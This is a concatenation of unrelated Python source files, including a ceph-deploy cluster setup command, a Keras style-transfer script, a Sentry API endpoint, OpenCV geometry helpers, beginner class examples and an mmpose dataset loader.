result = call_flowstar(flowstar_path,file_path,file_name, time_out)
for fname in os.listdir(file_path):
        if fname.startswith(os.path.splitext(file_name)[0]):
os.remove(os.path.join(file_path, fname))
return result
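# Usage sketch, kept as a comment because it assumes sympy and a local flowstar
# binary, neither of which this module imports. flowstar_verify writes the .model
# file, runs flowstar, parses the result and removes the generated files:
#
#     import sympy
#     x1, x2, k1 = sympy.symbols('x1 x2 k1')
#     result = flowstar_verify(
#         init_box=['[0.9,1.1]', '[-0.1,0.1]'],        # one interval per state variable
#         goal_symbolic=sympy.And(x1 >= 2, x2 >= 2),   # unsafe set, one relation per conjunct
#         time_max=5, symbol_list=[x1, x2],
#         dynamics=[x2, -x1 + k1 * x2],
#         parameter_list=[k1], parameter_box=[0.5],
#         flowstar_path='./flowstar', file_path='.', time_out=60)
#     # result is a dict with boolean 'sat' and 'time-out' entries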
|
# Generated by Django 3.0.8 on 2020-08-19 11:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rest', '0033_auto_20200819_2058'),
]
operations = [
migrations.AlterField(
model_name='culture_event',
name='name',
field=models.CharField(max_length=60, primary_key=True, serialize=False),
),
]
|
import errno
import logging
import os
import uuid
import struct
import time
import base64
import socket
from ceph_deploy.cliutil import priority
from ceph_deploy import conf, hosts, exc
from ceph_deploy.util import arg_validators, ssh, net
from ceph_deploy.misc import mon_hosts
from ceph_deploy.lib import remoto
from ceph_deploy.connection import get_local_connection
LOG = logging.getLogger(__name__)
def generate_auth_key():
key = os.urandom(16)
header = struct.pack(
'<hiih',
1, # le16 type: CEPH_CRYPTO_AES
int(time.time()), # le32 created: seconds
0, # le32 created: nanoseconds,
len(key), # le16: len(key)
)
return base64.b64encode(header + key)
def ssh_copy_keys(hostname, username=None):
LOG.info('making sure passwordless SSH succeeds')
if ssh.can_connect_passwordless(hostname):
return
LOG.warning('could not connect via SSH')
# Create the key if it doesn't exist:
id_rsa_pub_file = os.path.expanduser(u'~/.ssh/id_rsa.pub')
id_rsa_file = id_rsa_pub_file.split('.pub')[0]
if not os.path.exists(id_rsa_file):
LOG.info('creating a passwordless id_rsa.pub key file')
with get_local_connection(LOG) as conn:
remoto.process.run(
conn,
[
'ssh-keygen',
'-t',
'rsa',
'-N',
"",
'-f',
id_rsa_file,
]
)
# Get the contents of id_rsa.pub and push it to the host
LOG.info('will connect again with password prompt')
distro = hosts.get(hostname, username, detect_sudo=False)
auth_keys_path = '.ssh/authorized_keys'
if not distro.conn.remote_module.path_exists(auth_keys_path):
distro.conn.logger.warning(
'.ssh/authorized_keys does not exist, will skip adding keys'
)
else:
LOG.info('adding public keys to authorized_keys')
with open(os.path.expanduser('~/.ssh/id_rsa.pub'), 'r') as id_rsa:
contents = id_rsa.read()
distro.conn.remote_module.append_to_file(
auth_keys_path,
contents
)
distro.conn.exit()
def validate_host_ip(ips, subnets):
"""
    Make sure that, for a given host, every specified subnet contains at least
    one of the host's IPs.
"""
# Make sure we prune ``None`` arguments
subnets = [s for s in subnets if s is not None]
validate_one_subnet = len(subnets) == 1
def ip_in_one_subnet(ips, subnet):
""" ensure an ip exists in at least one subnet """
for ip in ips:
if net.ip_in_subnet(ip, subnet):
return True
return False
for subnet in subnets:
if ip_in_one_subnet(ips, subnet):
if validate_one_subnet:
return
else: # keep going to make sure the other subnets are ok
continue
else:
msg = "subnet (%s) is not valid for any of the ips found %s" % (subnet, str(ips))
raise RuntimeError(msg)
def get_public_network_ip(ips, public_subnet):
"""
    Given a public subnet, choose the one IP from the remote host that exists
within the subnet range.
"""
for ip in ips:
if net.ip_in_subnet(ip, public_subnet):
return ip
    msg = "IPs (%s) are not valid for the specified subnet %s" % (str(ips), str(public_subnet))
raise RuntimeError(msg)
def new(args):
if args.ceph_conf:
        raise RuntimeError('will not create a Ceph conf file when attempting to re-use one with the `--ceph-conf` flag')
LOG.debug('Creating new cluster named %s', args.cluster)
cfg = conf.ceph.CephConf()
cfg.add_section('global')
fsid = args.fsid or uuid.uuid4()
cfg.set('global', 'fsid', str(fsid))
# if networks were passed in, lets set them in the
# global section
if args.public_network:
cfg.set('global', 'public network', str(args.public_network))
if args.cluster_network:
cfg.set('global', 'cluster network', str(args.cluster_network))
mon_initial_members = []
mon_host = []
for (name, host) in mon_hosts(args.mon):
# Try to ensure we can ssh in properly before anything else
if args.ssh_copykey:
ssh_copy_keys(host, args.username)
# Now get the non-local IPs from the remote node
distro = hosts.get(host, username=args.username)
remote_ips = net.ip_addresses(distro.conn)
# custom cluster names on sysvinit hosts won't work
if distro.init == 'sysvinit' and args.cluster != 'ceph':
LOG.error('custom cluster names are not supported on sysvinit hosts')
raise exc.ClusterNameError(
'host %s does not support custom cluster names' % host
)
distro.conn.exit()
# Validate subnets if we received any
if args.public_network or args.cluster_network:
validate_host_ip(remote_ips, [args.public_network, args.cluster_network])
# Pick the IP that matches the public cluster (if we were told to do
# so) otherwise pick the first, non-local IP
LOG.debug('Resolving host %s', host)
if args.public_network:
ip = get_public_network_ip(remote_ips, args.public_network)
else:
ip = net.get_nonlocal_ip(host)
LOG.debug('Monitor %s at %s', name, ip)
mon_initial_members.append(name)
try:
socket.inet_pton(socket.AF_INET6, ip)
mon_host.append("[" + ip + "]")
LOG.info('Monitors are IPv6, binding Messenger traffic on IPv6')
cfg.set('global', 'ms bind ipv6', 'true')
except socket.error:
mon_host.append(ip)
LOG.debug('Monitor initial members are %s', mon_initial_members)
LOG.debug('Monitor addrs are %s', mon_host)
cfg.set('global', 'mon initial members', ', '.join(mon_initial_members))
# no spaces here, see http://tracker.newdream.net/issues/3145
cfg.set('global', 'mon host', ','.join(mon_host))
# override undesirable defaults, needed until bobtail
# http://tracker.ceph.com/issues/6788
cfg.set('global', 'auth cluster required', 'cephx')
cfg.set('global', 'auth service required', 'cephx')
cfg.set('global', 'auth client required', 'cephx')
# http://tracker.newdream.net/issues/3138
cfg.set('global', 'filestore xattr use omap', 'true')
path = '{name}.conf'.format(
name=args.cluster,
)
new_mon_keyring(args)
LOG.debug('Writing initial config to %s...', path)
tmp = '%s.tmp' % path
with file(tmp, 'w') as f:
cfg.write(f)
try:
os.rename(tmp, path)
except OSError as e:
if e.errno == errno.EEXIST:
raise exc.ClusterExistsError(path)
else:
raise
def new_mon_keyring(args):
LOG.debug('Creating a random mon key...')
mon_keyring = '[mon.]\nkey = %s\ncaps mon = allow *\n' % generate_auth_key()
keypath = '{name}.mon.keyring'.format(
name=args.cluster,
)
oldmask = os.umask(077)
LOG.debug('Writing monitor keyring to %s...', keypath)
try:
tmp = '%s.tmp' % keypath
with open(tmp, 'w', 0600) as f:
f.write(mon_keyring)
try:
os.rename(tmp, keypath)
except OSError as e:
if e.errno == errno.EEXIST:
raise exc.ClusterExistsError(keypath)
else:
raise
finally:
os.umask(oldmask)
@priority(10)
def make(parser):
"""
Start deploying a new cluster, and write a CLUSTER.conf and keyring for it.
"""
parser.add_argument(
'mon',
metavar='MON',
nargs='+',
help='initial monitor hostname, fqdn, or hostname:fqdn pair',
type=arg_validators.Hostname(),
)
parser.add_argument(
'--no-ssh-copykey',
dest='ssh_copykey',
action='store_false',
default=True,
help='do not attempt to copy SSH keys',
)
parser.add_argument(
'--fsid',
dest='fsid',
help='provide an alternate FSID for ceph.conf generation',
)
parser.add_argument(
'--cluster-network',
help='specify the (internal) cluster network',
type=arg_validators.Subnet(),
)
parser.add_argument(
'--public-network',
help='specify the public network for a cluster',
type=arg_validators.Subnet(),
)
parser.set_defaults(
func=new,
)
|
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
import sys
import time
start_time = time.time()
use_keras = True
if use_keras:
use_cntk = False
if use_cntk:
try:
base_directory = os.path.split(sys.executable)[0]
os.environ['PATH'] += ';' + base_directory
import cntk
os.environ['KERAS_BACKEND'] = 'cntk'
except ImportError:
print('CNTK not installed')
else:
os.environ['KERAS_BACKEND'] = 'tensorflow'
import keras
else:
import cntk
import cntk.ops.functions
import numpy as np
import scipy
import matplotlib.pyplot as plt
import time
import datetime
import random
random.seed(2018)
np.random.seed(2018)
def deprocess_image(x):
x[:, :, 0] += 103.939
x[:, :, 1] += 116.779
x[:, :, 2] += 123.68
# 'BGR'->'RGB'
x = x[:, :, ::-1]
x = np.clip(x, 0, 255).astype('uint8')
return x
def preprocess_image(image_path, img_height, img_width):
if use_keras is True:
import keras.preprocessing
import keras.applications
import keras.backend
else:
import keras.backend
keras.backend.set_image_data_format('channels_first')
img = keras.preprocessing.image.load_img(image_path, target_size=(img_height, img_width))
img = keras.preprocessing.image.img_to_array(img)
img = np.expand_dims(img, axis=0)
img = keras.applications.vgg19.preprocess_input(img)
return img
def content_loss(base, combination):
diff_ = combination - base
square_ = keras.backend.square(diff_)
sum_ = keras.backend.sum(square_)
return sum_
def gram_matrix(x):
# print('\n\nx=', keras.backend.int_shape(x))
x_shape = keras.backend.int_shape(x)
channels_first_ = keras.backend.permute_dimensions(x, (2, 0, 1))
features = keras.backend.reshape(channels_first_, (x_shape[2], x_shape[0]*x_shape[1]))
features_transposed = keras.backend.transpose(features)
gram = keras.backend.dot(features, features_transposed)
# import tensorflow as tf
# channels_first_ = keras.backend.permute_dimensions(x, (2, 0, 1))
# features = keras.backend.batch_flatten(channels_first_)
# features = tf.Print(features, ['x=', tf.shape(x), 'channels_first_', tf.shape(channels_first_), 'features=', tf.shape(features)])
# features_transposed = keras.backend.transpose(features)
# gram = keras.backend.dot(features, features_transposed)
return gram
def style_loss(style, combination, img_height, img_width):
style_gram = gram_matrix(style)
combination_gram = gram_matrix(combination)
channels = 3
size = img_height * img_width
scaling_factor = (4. * (channels ** 2) * (size ** 2))
square_ = keras.backend.square(style_gram - combination_gram)
sum_ = keras.backend.sum(square_)
result = sum_ / scaling_factor
return result
def total_variation_loss(x, img_height, img_width):
a_ = x[:, :img_height - 1, :img_width - 1, :] - x[:, 1:, :img_width - 1, :]
a = keras.backend.square(a_)
b_ = x[:, :img_height - 1, :img_width - 1, :] - x[:, :img_height - 1, 1:, :]
b = keras.backend.square(b_)
c = keras.backend.pow(a + b, 1.25)
result = keras.backend.sum(c)
return result
class Evaluator(object):
    # Caches the loss and gradients from one combined evaluation so that
    # scipy.optimize.fmin_l_bfgs_b can query them through separate callables.
def __init__(self, fetch_loss_and_grads, img_height, img_width):
self.loss_value = None
self.grad_values = None
self.fetch_loss_and_grads = fetch_loss_and_grads
self.img_height = img_height
self.img_width = img_width
def loss(self, x):
assert self.loss_value is None
x = x.reshape((1, self.img_height, self.img_width, 3))
outs = self.fetch_loss_and_grads([x])
loss_value = outs[0]
grad_values = outs[1].flatten().astype('float64')
self.loss_value = loss_value
self.grad_values = grad_values
return self.loss_value
def grads(self, x):
assert self.loss_value is not None
grad_values = np.copy(self.grad_values)
self.loss_value = None
self.grad_values = None
return grad_values
def plot_results(generated_image, target_image_path, style_reference_image_path, img_height, img_width):
plt.imshow(keras.preprocessing.image.load_img(target_image_path, target_size=(img_height, img_width)))
plt.figure()
plt.imshow(keras.preprocessing.image.load_img(style_reference_image_path, target_size=(img_height, img_width)))
plt.figure()
plt.imshow(generated_image)
plt.show()
def load_model(target_image_path, style_reference_image_path, img_height, img_width):
target_image_ = preprocess_image(target_image_path, img_height, img_width)
style_image_ = preprocess_image(style_reference_image_path, img_height, img_width)
if use_keras:
target_image = keras.backend.constant(target_image_)
style_reference_image = keras.backend.constant(style_image_)
combination_image = keras.backend.placeholder((1, img_height, img_width, 3))
input_tensor = keras.backend.concatenate([target_image, style_reference_image, combination_image], axis=0)
model = keras.applications.vgg19.VGG19(input_tensor=input_tensor, weights='imagenet', include_top=False)
print('Model loaded.')
else:
target_image = cntk.constant(value=target_image_)
style_reference_image = cntk.constant(value=style_image_)
combination_image = cntk.placeholder(shape=(1, 3, img_height, img_width))
input_tensor = cntk.ops.splice(target_image, style_reference_image, combination_image, axis=0)
print(input_tensor.output.shape)
quit()
return model, combination_image
def create_loss_criterion(model, combination_image, img_height, img_width):
outputs_dict = dict([(layer.name, layer.output) for layer in model.layers])
content_layer = 'block5_conv2'
style_layers = ['block1_conv1', 'block2_conv1', 'block3_conv1', 'block4_conv1', 'block5_conv1']
total_variation_weight = 1e-4
style_weight = 1.
content_weight = 0.025
loss = keras.backend.variable(0.)
layer_features = outputs_dict[content_layer]
target_image_features = layer_features[0, :, :, :]
combination_features = layer_features[2, :, :, :]
loss += content_weight * content_loss(target_image_features, combination_features)
for layer_name in style_layers:
layer_features = outputs_dict[layer_name]
style_reference_features = layer_features[1, :, :, :]
combination_features = layer_features[2, :, :, :]
sl = style_loss(style_reference_features, combination_features, img_height, img_width)
loss += (style_weight / len(style_layers)) * sl
loss += total_variation_weight * total_variation_loss(combination_image, img_height, img_width)
return loss
def style_transfer():
training_start_time = time.time()
target_image_path = '../DeepLearning/Ch_08_Neural_Style_Transfer/portrait.png'
style_reference_image_path = '../DeepLearning/Ch_08_Neural_Style_Transfer/popova.png'
img_height = 400
img_width = 381
model, combination_image = load_model(target_image_path, style_reference_image_path, img_height, img_width)
img = run_keras(model, combination_image, target_image_path, img_height, img_width)
print('Training Elapsed time: {0}'.format(datetime.timedelta(seconds=time.time() - training_start_time)))
plot_results(img, target_image_path, style_reference_image_path, img_height, img_width)
def run_keras(model, combination_image, target_image_path, img_height, img_width):
import scipy.optimize
loss = create_loss_criterion(model, combination_image, img_height, img_width)
grads = keras.backend.gradients(loss, combination_image)[0]
fetch_loss_and_grads = keras.backend.function([combination_image], [loss, grads])
evaluator = Evaluator(fetch_loss_and_grads, img_height, img_width)
x = preprocess_image(target_image_path, img_height, img_width)
x = x.flatten()
for i in range(5):
print('Start of iteration', i)
iteration_start_time = time.time()
x, min_val, info = scipy.optimize.fmin_l_bfgs_b(evaluator.loss, x, fprime=evaluator.grads, maxfun=20)
print('Current loss value:', min_val)
iteration_end_time = time.time()
print('Iteration %d completed in %ds' % (i, iteration_end_time - iteration_start_time))
img = x.copy().reshape((img_height, img_width, 3))
img = deprocess_image(img)
return img
if __name__ == '__main__':
style_transfer()
|
#!/usr/bin/env python
"""Client VFS handlers module root."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
|
from __future__ import absolute_import
from django.db.models import Q
from operator import or_
from rest_framework.response import Response
from six.moves import reduce
from sentry.api.bases.organization import OrganizationEndpoint
from sentry.api.serializers import serialize
from sentry.api.serializers.models.group import TagBasedStreamGroupSerializer
from sentry.models import (EventUser, Group, GroupTagValue)
class OrganizationUserIssuesEndpoint(OrganizationEndpoint):
def get(self, request, organization, user_id):
limit = request.GET.get('limit', 100)
euser = EventUser.objects.select_related('project__team').get(
project__organization=organization,
id=user_id,
)
# they have organization access but not to this project, thus
# they shouldn't be able to see this user
if not request.access.has_team_access(euser.project.team):
return Response([])
other_eusers = euser.find_similar_users(request.user)
event_users = [euser] + list(other_eusers)
if event_users:
tag_filters = [Q(value=eu.tag_value, project_id=eu.project_id) for eu in event_users]
tags = GroupTagValue.objects.filter(
reduce(or_, tag_filters),
key='sentry:user',
).order_by('-last_seen')[:limit]
else:
tags = GroupTagValue.objects.none()
tags = {t.group_id: t for t in tags}
if tags:
groups = sorted(
Group.objects.filter(
id__in=tags.keys(),
).order_by('-last_seen')[:limit],
key=lambda x: tags[x.id].last_seen,
reverse=True,
)
else:
groups = []
context = serialize(
groups, request.user, TagBasedStreamGroupSerializer(
stats_period=None,
tags=tags,
)
)
return Response(context)
|
from .manager import Manager, ModelType, QuerySet, ListManager
from .related import one_to_many, one_to_one, get_manager
from .model import Model
from .schema import ListField
|
from django.apps import AppConfig
class SharingcenterConfig(AppConfig):
name = 'sharingCenter'
|
# -*- coding: utf-8 -*-
import cv2 as cv
import numpy as np
from os import listdir
from os import path
from glob import glob
def GetContours(image, thresh=150):
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
grayBlur = cv.blur(gray, (3, 3))
canny = cv.Canny(grayBlur, thresh, thresh * 2)
contours = cv.findContours(canny, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)[0]
return contours
def GetContourProperties(contours):
centerList = []
arcLengthList = []
boundRectList = []
for contour in contours:
poly = cv.approxPolyDP(contour, 3, True)
mu = cv.moments(poly)
cx = mu['m10'] / (mu['m00'] + 1e-5)
cy = mu['m01'] / (mu['m00'] + 1e-5)
center = (cx, cy)
arcLength = cv.arcLength(poly, True)
boundRect = cv.boundingRect(poly)
centerList.append(center)
arcLengthList.append(arcLength)
boundRectList.append(boundRect)
return centerList, arcLengthList, boundRectList
def CreateRectGroups(rects, minW, minH):
res = []
while len(rects) > 0:
rect = rects.pop(0)
while True:
changed = False
rectsUnused = []
for rect2 in rects:
if not RectIsIntersected(rect, rect2):
rectsUnused.append(rect2)
continue
if rect[2] > minW and rect[3] > minH:
res.append(rect)
if rect2[2] > minW and rect2[3] > minH:
res.append(rect2)
rect = RectUnite(rect, rect2)
changed = True
rects = rectsUnused
if not changed:
break
res.append(rect)
return res
def RectIsIntersected(a, b):
x = max(a[0], b[0])
y = max(a[1], b[1])
w = min(a[0] + a[2], b[0] + b[2]) - x
h = min(a[1] + a[3], b[1] + b[3]) - y
if w < 0 or h < 0:
return False
return True
def RectUnite(a, b):
x = min(a[0], b[0])
y = min(a[1], b[1])
w = max(a[0] + a[2], b[0] + b[2]) - x
h = max(a[1] + a[3], b[1] + b[3]) - y
return x, y, w, h
def RemoveFloor(image, hsvMin=(0, 0, 185), hsvMax=(0, 0, 195)):
hsv = cv.cvtColor(image, cv.COLOR_BGR2HSV)
mask = 255 - cv.inRange(hsv, hsvMin, hsvMax)
return cv.bitwise_and(image, image, None, mask)
def RemoveSocialDistance(image, hsvMin=(40, 0, 0), hsvMax=(45, 255, 255)):
hsv = cv.cvtColor(image, cv.COLOR_BGR2HSV)
mask = 255 - cv.inRange(hsv, hsvMin, hsvMax)
return cv.bitwise_and(image, image, None, mask)
def ExtractSocialDistance(image, hsvMin=(40, 0, 0), hsvMax=(45, 255, 255)):
hsv = cv.cvtColor(image, cv.COLOR_BGR2HSV)
mask = cv.inRange(hsv, hsvMin, hsvMax)
return cv.bitwise_and(image, image, None, mask)
def GetHogDescriptor(winSize=(20, 20),
blockSize=(10, 10),
blockStride=(5, 5),
cellSize=(10, 10),
nbins=9,
derivAperture=1,
winSigma=-1,
histogramNormType=0,
L2HysThreshold=0.2,
gammaCorrection=1,
nlevels=64,
useSignedGradients=True):
return cv.HOGDescriptor(winSize, blockSize, blockStride,
cellSize, nbins, derivAperture,
winSigma, histogramNormType, L2HysThreshold,
gammaCorrection, nlevels, useSignedGradients)
def ResizeHog(image, w=64, h=128):
return cv.resize(image, (w, h))
def GetTrainedSvm():
data = []
dataTypes = []
dataDir = path.join('/', 'data')
for i, subdir in enumerate(listdir(dataDir)):
dataTypes.append(subdir)
data.append([])
for dataPath in glob(path.join(dataDir, subdir, '*.png')):
image = cv.imread(dataPath)
image = RemoveFloor(image)
image = RemoveSocialDistance(image)
data[i].append(image)
hog = GetHogDescriptor()
descriptors = []
for i, images in enumerate(data):
descriptors.append([])
for image in images:
resized = ResizeHog(image)
descriptors[i].append(hog.compute(resized))
trainLabels = []
trainDescriptors = []
for label, descriptor in enumerate(descriptors):
for des in descriptor:
trainLabels.append(label)
trainDescriptors.append(des)
trainLabels = np.array(trainLabels)
trainDescriptors = np.array(trainDescriptors)
svm = cv.ml.SVM_create()
svm.trainAuto(trainDescriptors, cv.ml.ROW_SAMPLE, trainLabels)
return svm, dataTypes
def GetRectCenter(rect):
x, y, w, h = rect
return x + w / 2.0, y + h / 2.0
def LineIsIntersected(line1, line2, eps=1e-7):
a1 = np.array(line1[0])
a2 = np.array(line1[1])
b1 = np.array(line2[0])
b2 = np.array(line2[1])
if abs(np.cross(a2 - a1, b2 - b1)) < eps:
return False
if np.cross(a2 - a1, b1 - a1) * np.cross(a2 - a1, b2 - a1) > eps:
return False
if np.cross(b2 - b1, a1 - b1) * np.cross(b2 - b1, a2 - b1) > eps:
return False
return True
def GetIntersection(line1, line2):
xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])
ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])
def det(a, b):
return a[0] * b[1] - a[1] * b[0]
div = det(xdiff, ydiff)
if div == 0:
raise Exception('lines do not intersect')
d = (det(*line1), det(*line2))
x = det(d, xdiff) / float(div)
y = det(d, ydiff) / float(div)
return x, y
def GetPointDistance(a, b):
a = np.array(a)
b = np.array(b)
return np.linalg.norm(a - b)
def GetRectDistance(rect1, rect2):
if RectIsIntersected(rect1, rect2):
return 0.0
c1 = GetRectCenter(rect1)
c2 = GetRectCenter(rect2)
intersections = []
for rect in [rect1, rect2]:
x, y, w, h = rect
a = (x, y)
b = (x, y + h)
c = (x + w, y + h)
d = (x + w, y)
for line in [(a, b), (b, c), (c, d), (d, a)]:
if not LineIsIntersected(line, (c1, c2)):
continue
intersected = line
break
intersection = GetIntersection(intersected, (c1, c2))
intersections.append(intersection)
distance = GetPointDistance(*intersections)
return distance
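# Small self-check of the rectangle helpers above; the coordinates are illustrative.
if __name__ == '__main__':
    r1 = (0, 0, 10, 10)    # x, y, w, h
    r2 = (20, 0, 10, 10)   # 10 px to the right of r1
    print(RectIsIntersected(r1, r2))   # False
    print(RectUnite(r1, r2))           # (0, 0, 30, 10)
    print(GetRectDistance(r1, r2))     # 10.0, measured between the facing edges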
|
#Python Arrays
#--------------------------------------------------------------------------------------------------------
#Python Classes and Objects
class MyClass:
x = 5
hola=MyClass()
print(hola.x)
##
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
p1 = Person("John", 36)
print(p1.name)
print(p1.age)
##
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def myfunc(self):
print("Hello my name is " + self.name)
p1 = Person("John", 36)
p1.myfunc()
print(p1.age)
#--------------------------------------------------------------------------------------------------------
#Python Inheritance
#Create a Parent Class
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
#Use the Person class to create an object, and then execute the printname method:
x = Person("John", "Doe")
x.printname()
#Add the __init__() Function
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
Person.__init__(self, fname, lname)
x = Student("Mike", "Olsen")
x.printname()
##Use the super() Function
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
super().__init__(fname, lname)
x = Student("Mike", "Olsen")
x.printname()
##
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
Person.__init__(self,fname, lname)
x = Student("Mike", "Olsen")
x.printname()
##
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
        super().__init__(fname, lname)
        self.graduationyear = 2019
x = Student("Mike", "Olsen")
print(x.graduationyear)
##
class Person():
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
super().__init__(fname, lname)
self.graduationyear = 2019
casa = Student("Mike", "Olsen")
print(casa.graduationyear)
#--------------------------------------------------------------------------------------------------------
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
super().__init__(fname, lname)
self.graduationyear = 2019
x = Student("Mike", "Olsen")
print(x.graduationyear)
#--------------------------------------------------------------------------------------------------------
mytuple = ["apple", "banana", "cherry"]
myit = iter(mytuple)
print(myit)
print(next(myit))
print(next(myit))
print(next(myit))
#--------------------------------------------------------------------------------------------------------
username = input("Enter username:")
print("Username is: " + username)
#--------------------------------------------------------------------------------------------------------
#"r" - Read - Default value. Opens a file for reading, error if the file does not exist
#"a" - Append - Opens a file for appending, creates the file if it does not exist
#"w" - Write - Opens a file for writing, creates the file if it does not exist
#"x" - Create - Creates the specified file, returns an error if the file exists
#--------------------------------------------------------------------------------------------------------
|
from __future__ import annotations
from typing import Callable, Union, Tuple
from fn import F
from ..util import dict_add
class Args(F):
"""
A variable wrapper for pipe operations.
Args:
args, kwargs: The arguments to be passed to the pipe.
Examples::
from tensorneko.util import __, _
result = __(20) >> (_ + 1) >> (_ * 2) >> __.get
print(result)
# 42
"""
def __init__(self, *args, **kwargs):
super().__init__()
self.args = args
self.kwargs = kwargs
def __ensure_callable(self, inputs):
return Args(*(self.args + inputs), **self.kwargs) if isinstance(inputs, tuple) else inputs
    def __lshift__(self, g):
        """Overload << operator for Args and F instances"""
raise ValueError("The Args instance cannot be the end of a pipe.")
def __rshift__(self, g: Union[Callable, Tuple, Args, F]) -> Union[Args, any]:
"""Overload >> operator for F instances"""
if type(g) is Args:
return Args(*(self.args + g.args), **(dict_add(self.kwargs, g.kwargs)))
elif isinstance(g, tuple):
return self.__ensure_callable(g)
elif any(map(lambda getter: g is getter, (Args.get, Args.get_args, Args.get_value, Args.get_kwargs))):
return g(self)
else:
return Args(g(*self.args, **self.kwargs))
def __call__(self, *args, **kwargs):
"""Overload apply operator"""
raise TypeError("The 'Args' is not callable")
def __repr__(self):
kwargs_str = ""
for k, v in self.kwargs.items():
kwargs_str = f"{kwargs_str}, {k}={v}"
return f"({', '.join(map(str, self.args))}{kwargs_str})"
def get(self) -> any:
return self.args[0]
def get_args(self) -> tuple:
return self.args
def get_kwargs(self) -> dict:
return self.kwargs
    def get_value(self, key: str) -> any:
return self.kwargs[key]
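# Two more chaining examples, shown as comments (the values are illustrative):
#   Args(1, 2) >> (lambda a, b: a + b) >> Args.get     # -> 3
#   Args(1) >> (2, 3) >> Args.get_args                 # -> (1, 2, 3)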
|
a = 10
b = 20
c =30
d = 8
print("helloworld")
|
# Copyright (c) OpenMMLab. All rights reserved.
import os
import warnings
import numpy as np
from mmcv import Config
from xtcocotools.cocoeval import COCOeval
from ...builder import DATASETS
from .topdown_coco_dataset import TopDownCocoDataset
@DATASETS.register_module()
class TopDownCocoWholeBodyDataset(TopDownCocoDataset):
"""CocoWholeBodyDataset dataset for top-down pose estimation.
`Whole-Body Human Pose Estimation in the Wild' ECCV'2020
More details can be found in the `paper
<https://arxiv.org/abs/2007.11858>`__ .
The dataset loads raw features and apply specified transforms
to return a dict containing the image tensors and other information.
In total, we have 133 keypoints for wholebody pose estimation.
COCO-WholeBody keypoint indexes::
0-16: 17 body keypoints
17-22: 6 foot keypoints
23-90: 68 face keypoints
91-132: 42 hand keypoints
Args:
ann_file (str): Path to the annotation file.
img_prefix (str): Path to a directory where images are held.
Default: None.
data_cfg (dict): config
pipeline (list[dict | callable]): A sequence of data transforms.
dataset_info (DatasetInfo): A class containing all dataset info.
test_mode (bool): Store True when building test or
validation dataset. Default: False.
"""
def __init__(self,
ann_file,
img_prefix,
data_cfg,
pipeline,
dataset_info=None,
test_mode=False):
if dataset_info is None:
warnings.warn(
'dataset_info is missing. '
'Check https://github.com/open-mmlab/mmpose/pull/663 '
'for details.', DeprecationWarning)
cfg = Config.fromfile('configs/_base_/datasets/coco_wholebody.py')
dataset_info = cfg._cfg_dict['dataset_info']
super(TopDownCocoDataset, self).__init__(
ann_file,
img_prefix,
data_cfg,
pipeline,
dataset_info=dataset_info,
test_mode=test_mode)
self.use_gt_bbox = data_cfg['use_gt_bbox']
self.bbox_file = data_cfg['bbox_file']
self.det_bbox_thr = data_cfg.get('det_bbox_thr', 0.0)
self.use_nms = data_cfg.get('use_nms', True)
self.soft_nms = data_cfg['soft_nms']
self.nms_thr = data_cfg['nms_thr']
self.oks_thr = data_cfg['oks_thr']
self.vis_thr = data_cfg['vis_thr']
self.body_num = 17
self.foot_num = 6
self.face_num = 68
self.left_hand_num = 21
self.right_hand_num = 21
self.db = self._get_db()
print(f'=> num_images: {self.num_images}')
print(f'=> load {len(self.db)} samples')
def _load_coco_keypoint_annotation_kernel(self, img_id):
"""load annotation from COCOAPI.
Note:
bbox:[x1, y1, w, h]
Args:
img_id: coco image id
Returns:
dict: db entry
"""
img_ann = self.coco.loadImgs(img_id)[0]
width = img_ann['width']
height = img_ann['height']
num_joints = self.ann_info['num_joints']
ann_ids = self.coco.getAnnIds(imgIds=img_id, iscrowd=False)
objs = self.coco.loadAnns(ann_ids)
# sanitize bboxes
valid_objs = []
for obj in objs:
x, y, w, h = obj['bbox']
x1 = max(0, x)
y1 = max(0, y)
x2 = min(width - 1, x1 + max(0, w - 1))
y2 = min(height - 1, y1 + max(0, h - 1))
if ('area' not in obj or obj['area'] > 0) and x2 > x1 and y2 > y1:
obj['clean_bbox'] = [x1, y1, x2 - x1, y2 - y1]
valid_objs.append(obj)
objs = valid_objs
rec = []
bbox_id = 0
for obj in objs:
if max(obj['keypoints']) == 0:
continue
joints_3d = np.zeros((num_joints, 3), dtype=np.float32)
joints_3d_visible = np.zeros((num_joints, 3), dtype=np.float32)
keypoints = np.array(obj['keypoints'] + obj['foot_kpts'] +
obj['face_kpts'] + obj['lefthand_kpts'] +
obj['righthand_kpts']).reshape(-1, 3)
joints_3d[:, :2] = keypoints[:, :2]
joints_3d_visible[:, :2] = np.minimum(1, keypoints[:, 2:3] > 0)
center, scale = self._xywh2cs(*obj['clean_bbox'][:4])
image_file = os.path.join(self.img_prefix, self.id2name[img_id])
rec.append({
'image_file': image_file,
'center': center,
'scale': scale,
'rotation': 0,
'joints_3d': joints_3d,
'joints_3d_visible': joints_3d_visible,
'dataset': self.dataset_name,
'bbox_score': 1,
'bbox_id': bbox_id
})
bbox_id = bbox_id + 1
return rec
